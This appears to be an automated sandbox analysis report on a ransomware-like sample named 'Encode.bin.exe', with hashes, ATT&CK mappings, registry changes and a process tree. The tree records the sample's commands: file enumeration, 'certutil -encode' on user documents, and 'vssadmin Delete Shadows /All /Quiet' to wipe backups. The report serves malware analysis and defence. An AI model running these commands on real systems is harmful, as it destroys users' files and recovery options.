3b60577fe6abb4637b2d1bee5b3d47f70f7230ace340d712a9c7fb1a642688b4

Analysis

max time kernel
143s
max time network
172s
platform
windows7_x64
resource
win7v20210410
submitted
21/06/2021, 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Encode.bin.exe
Size

153KB
MD5

5163f03f6789656605108bec4650b66f
SHA1

c32e012da9257780d2031f683457da1840615c9c
SHA256

fb3b67d7f94630f41e722de49c211d8f5c69cdec8fc9ba25996717a77f67b89b
SHA512

13f0a1223330676bf5b81ee6fe64c963bcbeedb5589c96759573919a3e47aaf2e3b387edf2aa99cbded1f086df320cf0e03c06ba1f88f0a06a67014e3552cece

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Encode.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Encode.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
568	vssadmin.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\.encrypted	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\.encrypted\ = "encrypted_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeBackupPrivilege	636	vssvc.exe
Token: SeRestorePrivilege	636	vssvc.exe
Token: SeAuditPrivilege	636	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1876	WMIC.exe
Token: SeSecurityPrivilege	1876	WMIC.exe
Token: SeTakeOwnershipPrivilege	1876	WMIC.exe
Token: SeLoadDriverPrivilege	1876	WMIC.exe
Token: SeSystemProfilePrivilege	1876	WMIC.exe
Token: SeSystemtimePrivilege	1876	WMIC.exe
Token: SeProfSingleProcessPrivilege	1876	WMIC.exe
Token: SeIncBasePriorityPrivilege	1876	WMIC.exe
Token: SeCreatePagefilePrivilege	1876	WMIC.exe
Token: SeBackupPrivilege	1876	WMIC.exe
Token: SeRestorePrivilege	1876	WMIC.exe
Token: SeShutdownPrivilege	1876	WMIC.exe
Token: SeDebugPrivilege	1876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1876	WMIC.exe
Token: SeRemoteShutdownPrivilege	1876	WMIC.exe
Token: SeUndockPrivilege	1876	WMIC.exe
Token: SeManageVolumePrivilege	1876	WMIC.exe
Token: 33	1876	WMIC.exe
Token: 34	1876	WMIC.exe
Token: 35	1876	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	26
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1864	1232	cmd.exe	28
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1712	1232	cmd.exe	29
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1732	1232	cmd.exe	30
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1752	1232	cmd.exe	31
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1692	1232	cmd.exe	32
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1404	1232	cmd.exe	33
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 1308	1232	cmd.exe	34
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 844	1232	cmd.exe	35
PID 1232 wrote to memory of 1596	1232	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\Encode.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Encode.bin.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "Encode.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.txt
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Desktop\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Desktop\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Desktop\UpdateConvertTo.txt" "C:\Users\Admin\Desktop\UpdateConvertTo.txt.encrypted"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.doc
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.bat
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Desktop\AddExport.cmd" "C:\Users\Admin\Desktop\AddExport.cmd.encrypted"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.html
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.txt
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Downloads\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Downloads\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.doc
    3⤵
    PID:320
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Downloads\ConvertToDisconnect.doc" "C:\Users\Admin\Downloads\ConvertToDisconnect.doc.encrypted"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.bat
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Downloads\OutShow.bat" "C:\Users\Admin\Downloads\OutShow.bat.encrypted"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
    3⤵
    PID:804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.html
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Downloads\ImportUpdate.html" "C:\Users\Admin\Downloads\ImportUpdate.html.encrypted"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.txt
    3⤵
    PID:456
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.doc
    3⤵
    PID:660
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\Are.docx" "C:\Users\Admin\Documents\Are.docx.encrypted"
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\Files.docx" "C:\Users\Admin\Documents\Files.docx.encrypted"
    3⤵
    PID:956
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\Opened.docx" "C:\Users\Admin\Documents\Opened.docx.encrypted"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\Recently.docx" "C:\Users\Admin\Documents\Recently.docx.encrypted"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\These.docx" "C:\Users\Admin\Documents\These.docx.encrypted"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.bat
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.html
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
    3⤵
    PID:608
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode "C:\Users\Admin\Documents\DisconnectNew.rtf" "C:\Users\Admin\Documents\DisconnectNew.rtf.encrypted"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:568
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted
1⤵
- Modifies registry class
PID:1688
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted
  2⤵
  PID:1248

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact